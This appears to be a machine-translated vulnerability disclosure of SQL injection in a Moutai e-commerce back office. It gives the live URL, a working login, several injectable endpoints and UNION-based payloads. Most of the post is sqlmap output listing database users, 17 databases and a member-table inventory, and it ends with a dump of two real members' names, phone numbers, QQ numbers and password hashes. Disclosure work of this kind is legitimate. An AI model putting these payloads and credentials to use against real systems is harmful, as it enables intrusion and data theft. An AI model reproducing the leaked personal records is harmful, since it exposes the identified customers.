Moutai e-commerce has multiple SQL Injection packages in the background (DBA permission/17 databases/47W members)

Moutai e-commerce has multiple SQL Injection packages in the background (DBA permission/17 databases/47W members)

Note:

Http://www.emaotai.cn: 90/zyd/

Account: wanglei

Password 123456

Get submit method SQL injection point:

Http://www.emaotai.cn: 90/zyd/Sales/XsdEdit. aspx? Pjbh = 111000100020 & ReturnPage = Xsmxz. aspx & op = 2

http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650

http://www.emaotai.cn:90/zyd/Store/Kctz.aspx?ReturnPage=Tzflz.aspx&spbh=18

Post submitted injection points (you can find them by entering single quotes in the search box ):

There are still many similar problems. Check the problem yourself.

http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650

Example

Payload: ReturnPage = Xsflz. aspx & spbh =-4455 'Union all select char (113) + CHAR (1

22)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)-----[09:33:34] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NETback-end DBMS: Microsoft SQL Server 2008[09:33:34] [INFO] fetching database users[09:33:35] [INFO] the SQL query used returns 12 entries[09:33:35] [INFO] retrieved: ##MS_PolicyEventProcessingLogin##[09:33:35] [INFO] retrieved: ##MS_PolicyTsqlExecutionLogin##[09:33:36] [INFO] retrieved: actuser[09:33:36] [INFO] retrieved: bmDev[09:33:36] [INFO] retrieved: dev[09:33:36] [INFO] retrieved: distributor_admin[09:33:37] [INFO] retrieved: hishop_pj[09:33:37] [INFO] retrieved: hishop_pj[09:33:37] [INFO] retrieved: moutaiwssc[09:33:38] [INFO] retrieved: mysys[09:33:38] [INFO] retrieved: sa[09:33:38] [INFO] retrieved: taxreaderdatabase management system users [11]:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] actuser[*] bmDev[*] dev[*] distributor_admin[*] hishop_pj[*] moutaiwssc[*] mysys[*] sa[*] taxreader

 

Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)-----[09:31:54] [INFO] testing Microsoft SQL Server[09:31:54] [INFO] confirming Microsoft SQL Server[09:31:55] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NETback-end DBMS: Microsoft SQL Server 2008[09:31:55] [INFO] fetching database names[09:31:55] [INFO] the SQL query used returns 18 entries[09:31:56] [INFO] retrieved: distribution[09:31:56] [INFO] retrieved: DrpEco[09:31:56] [INFO] retrieved: drpecosdl[09:31:56] [INFO] retrieved: DrpEcoTest[09:31:57] [INFO] retrieved: eAct[09:31:57] [INFO] retrieved: eActTest[09:31:57] [INFO] retrieved: emaotai_act_test[09:31:58] [INFO] retrieved: emaotai_act_test[09:31:58] [INFO] retrieved: emaotai_logs[09:31:58] [INFO] retrieved: hishop[09:31:59] [INFO] retrieved: master[09:31:59] [INFO] retrieved: model[09:31:59] [INFO] retrieved: moutai[09:31:59] [INFO] retrieved: moutaitest[09:32:00] [INFO] retrieved: msdb[09:32:00] [INFO] retrieved: ReportServer[09:32:00] [INFO] retrieved: ReportServerTempDB[09:32:01] [INFO] retrieved: tempdbavailable databases [17]:[*] distribution[*] DrpEco[*] drpecosdl[*] DrpEcoTest[*] eAct[*] eActTest[*] emaotai_act_test[*] emaotai_logs[*] hishop[*] master[*] model[*] moutai[*] moutaitest[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb

Database: hishop+------------------------------------+---------+| Table                              | Entries |+------------------------------------+---------+| dbo.Hishop_CouponItems             | 2473863 || dbo.vw_Hishop_CouponInfo           | 2473863 || dbo.aspnet_Members                 | 476302  || dbo.vw_aspnet_Members              | 476299  || dbo.Hishop_MessageContent          | 104862  || dbo.Hishop_MemberMessageBox        | 104674  || dbo.vw_Hishop_MemberMessageBox     | 104670  || dbo.aspnet_UsersInRoles            | 82703   || dbo.aspnet_UsersInRoles            | 82703   || dbo.Hishop_OrderItems              | 38235   || dbo.vw_Hishop_SaleDetails          | 38227   || dbo.vw_Hishop_OrderItem            | 20446   || dbo.Hishop_OrderOptions            | 18255   || dbo.Hishop_ManagerMessageBox       | 14698   || dbo.vw_Hishop_ManagerMessageBox    | 14695   || dbo.Hishop_PointDetails            | 14127   || dbo.xupiaoOrder                    | 12710   || dbo.Hishop_UserShippingAddresses   | 12014   || dbo.Hishop_Logs                    | 10193   || dbo.Hishop_OrderDebitNote          | 8515    || dbo.vw_Hishop_OrderDebitNote       | 8509    || dbo.Hishop_SMSLog                  | 7484    || dbo.Hishop_BookingOrderSend        | 4447    || dbo.Hishop_PhotoGallery            | 3791    || dbo.Hishop_Favorite                | 2395    || dbo.Hishop_ProductConsultations    | 1414    || dbo.vw_Hishop_ProductConsultations | 1414    || dbo.t_sys_Columdef                 | 1261    || dbo.Hishop_ProductReviews          | 1127    || dbo.vw_Hishop_ProductReviews       | 1127    || dbo.HiShop_PayMentDetail           | 656     || dbo.Hishop_PrivilegeInRoles        | 541     || dbo.Hishop_SKUMemberPrice          | 412     || dbo.Hishop_Products                | 375     || dbo.Hishop_SKUs                    | 375     || dbo.vw_Hishop_BrowseProductList    | 375     || dbo.vw_Hishop_ProductSkuList       | 375     || dbo.Hishop_OrderRefund             | 371     || dbo.vw_Hishop_OrderRefund          | 371     || dbo.Hishop_ProductTag              | 354     || dbo.Vshop_RelatedTopicProducts     | 202     || dbo.Hishop_InpourRequest           | 198     || dbo.t_sys_tabledef                 | 191     || dbo.Hishop_BalanceDetails          | 175     || dbo.Hishop_LeaveCommentReplys      | 131     || dbo.Hishop_LeaveComments           | 127     || dbo.t_cx_sql                       | 114     || dbo.Hishop_ShoppingCarts           | 88      || dbo.t_sys_StoreProc                | 87      || dbo.aspnet_Managers                | 80      || dbo.Vshop_HomeProducts             | 69      || dbo.vw_aspnet_Managers             | 69      || dbo.Hishop_Articles                | 65      || dbo.vw_Hishop_Articles             | 65      || dbo.Hishop_OrderReturns            | 56      || dbo.vw_Hishop_OrderReturns         | 56      || dbo.vshop_Reply                    | 47      || dbo.Hishop_PromotionMemberGrades   | 40      || dbo.Hishop_ProductTypeBrands       | 38      || dbo.Hishop_VoteItems               | 38      || dbo.tmp_orders                     | 38      || dbo.Vshop_Topics                   | 32      || dbo.Hishop_Affiche                 | 28      || dbo.Hishop_Categories              | 28      || dbo.Hishop_Hotkeywords             | 28      || dbo.Hishop_Helps                   | 26      || dbo.Hishop_OrderReplace            | 26      || dbo.vw_Hishop_Helps                | 26      || dbo.vw_Hishop_OrderReplace         | 26      || dbo.Hishop_PhotoCategories         | 23      || dbo.Hishop_BundlingProductItems    | 21      || dbo.Hishop_OrderSendNote           | 20      || dbo.Hishop_OrderSendNote           | 20      || dbo.vw_Hishop_OrderSendNote        | 20      || dbo.Hishop_CountDown               | 19      || dbo.vw_Hishop_CountDown            | 19      || dbo.vshop_Menu                     | 18      || dbo.Hishop_BrandCategories         | 17      || dbo.Hishop_CouponsLog              | 14      || dbo.Hishop_CouponsLog              | 14      || dbo.Hishop_MessageTemplates        | 13      || dbo.Hishop_Tags                    | 13      || dbo.Hishop_ExpressTemplates        | 11      || dbo.Hishop_RelatedProducts         | 11      || dbo.aspnet_Roles                   | 10      || dbo.Hishop_Promotions              | 10      || dbo.Hishop_BundlingProducts        | 9       || dbo.vshop_Message                  | 9       || dbo.Vshop_PrizeRecord              | 9       || dbo.vw_Hishop_BundlingProducts     | 9       || dbo.Hishop_Votes                   | 8       || dbo.Hishop_Banner                  | 7       || dbo.Hishop_ActivityProduct         | 6       || dbo.Hishop_AttributeValues         | 6       || dbo.Hishop_FriendlyLinks           | 6       || dbo.Hishop_HelpCategories          | 6       || dbo.vshop_ActivitySignUp           | 6       || dbo.Hishop_ActivityManage          | 5       || dbo.Hishop_ArticleCategories       | 5       || dbo.Hishop_ProductTypes            | 5       || dbo.aspnet_MemberGrades            | 4       || dbo.Hishop_PaymentTypes            | 4       || dbo.Hishop_TemplateRelatedShipping | 4       || dbo.Hishop_MemberClientSet         | 3       || dbo.Hishop_RelatedArticsProducts   | 3       || dbo.CustomMade_WebPoints           | 2       || dbo.Hishop_Attributes              | 2       || dbo.Hishop_OrderLookupItems        | 2       || dbo.Hishop_ShippingTypes           | 2       || dbo.Hishop_GroupBuyCondition       | 1       || dbo.Hishop_GroupBuyCondition       | 1       || dbo.Hishop_MessageWhiteList        | 1       || dbo.Hishop_OrderLookupLists        | 1       || dbo.Hishop_ProductBooking          | 1       || dbo.Hishop_Shippers                | 1       || dbo.Hishop_ShippingTemplates       | 1       || dbo.Hishop_TableLock               | 1       || dbo.t_sys_project                  | 1       || dbo.vw_Hishop_GroupBuy             | 1       |+------------------------------------+---------+

Aspnet_Members is a member table with 476302 data entries. Check the first two data entries.

Payload: ReturnPage = Xsflz. aspx & spbh =-4455 'Union all select char (113) + CHAR (1

22) + CHAR (118) + CHAR (120) + CHAR (113) + CHAR (66) + CHAR (108) + CHAR (78) + CHAR (99) + CHAR (104) + CHAR (87) + CHAR (106) + CHAR (74) + CHAR (76) + CHAR (83) + CHAR (113) + CHAR (98) + CHAR (107) + CHAR (118) + CHAR (113) ----- [09:55:19] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP. NET 4.0.30319, ASP. NETback-end DBMS: microsoft SQL Server 2008 [09:55:19] [INFO] fetching columns for table 'aspnet _ Members 'in database 'hishop' [09:55:19] [INFO] the SQL query used returns 31 entries [09:55:19] [INFO] fetching entries for table 'aspnet _ Members 'in database 'hishop' [09:55:19] [INFO] fetching number of distinct values for column 'qq' [09:55:19] [INFO] fetching number of distinct values for column 'msn '[09:55:19] [INFO] fetching number of distinct values for column 'openid' [09:55:19] [INFO] fetching number of distinct values for column 'points '[09:55:19] [INFO] fetching number of distinct values for column 'typeid' [09:55:19] [INFO] fetching number of distinct values for column 'address' [09:55:19] [INFO] fetching number of distinct values for column 'balance '[09:55:19] [INFO] fetching number of distinct values for column 'gradeid' [09:55:19] [INFO] fetching number of distinct values for column 'zipcode '[09:55:19] [INFO] fetching number of distinct values for column 'countbuy' [09:55:19] [INFO] fetching number of distinct values for column 'realname' [09:55:19] [INFO] fetching number of distinct values for column 'regionid' [09:55:19] [INFO] fetching number of distinct values for column 'telphone' [09:55:19] [INFO] fetching number of distinct values for column 'wangwang '[09:55:19] [INFO] fetching number of distinct values for column 'Cellphone' [09:55:19] [INFO] fetching number of distinct values for column 'sessionid' [09:55:19] [INFO] fetching number of distinct values for column 'userid _ drp' [09:55:19] [INFO] fetching number of distinct values for column 'Expenditure '[09:55:19] [INFO] fetching number of distinct values for column 'ordernumber' [09:55:19] [INFO] fetching number of distinct values for column 'topregionid' [09:55:19] [INFO] fetching number of distinct values for column 'vipcarddate' [09:55:19] [INFO] fetching number of distinct values for column 'isopenbalance '[09:55:19] [INFO] fetching number of distinct values for column 'vipcardnumber' [09:55:19] [INFO] fetching number of distinct values for column 'referraluserid' [09:55:19] [INFO] fetching number of distinct values for column 'requestbalance '[09:55:19] [INFO] fetching number of distinct values for column 'sessionendtime' [09:55:19] [INFO] fetching number of distinct values for column 'recordstatus _ drp' [09:55:19] [INFO] fetching number of distinct values for column 'tradepasswordsalt' [09:55:19] [INFO] fetching number of distinct values for column 'tradepasswordformat' [09:55:19] [WARNING] no proper character column provided (with unique values ). it won't be possible to retrieve all rows [09:55:20] [INFO] analyzing table dump for possible password hashesDatabase: hishopTable: aspnet_Members [2 entries] + -------- + --------- + ---------- + ----------- + upper + lower + upper + --------- + -------- + --------- + ---------- ---------- + ------------- + response + ----------- + response + | typeid | OpenId | GradeId | RegionId | SessionId | region | TopRegionId | referralid | QQ | MSN | Points | Zipcode | Address | Balance | Wangwang | CountBuy | RealName | TelPhone | CellPhone | VipCardDate | OrderNumber | Expenditure | VipCardNumber | IsOpenBalance | SessionEndTime | RequestBalance | Balance | | TradePasswordFormat | + -------- + --------- + ---------- + ----------- + upper + lower + upper + --------- + -------- + --------- + ---------- + ------------ + ------------- + hour + --------------- + ---------------- + ------------------ + hour + | 1 | NULL | 1 | 897 | NULL | 20141012000065 | 883 | NULL | 928095509 |  | 0 | NULL |  | 0.00 | NULL | Yang zhiguang | NULL | 13103529668 | 10 122014 PM | 0 | 0.00 | NULL | 1 | NULL | 0.00 | 3 | CRJAUboLeduKT + mKpKLZxg = | 1 | | 1 | NULL | 1 | 3139 | NULL | 20141022000012 | 3130 | NULL | 233629822 |  | 0 | NULL |  | 0.00 | NULL | luoping | NULL | 13980951791 | 10 22 2014 AM | 0 | 0.00 | NULL | 0 | NULL | 0.00 | 2 | f0uaf1ciax6tjpaljitwq = | 1 | + -------- + --------- + ---------- + ----------- + response + --------- + -------- + --------- + ---------- + ------------- + response + ------------- + --------------- + ---------------- + ------------------ + ---------------------------------- + ---------------------------    

Solution:

You are more professional than me.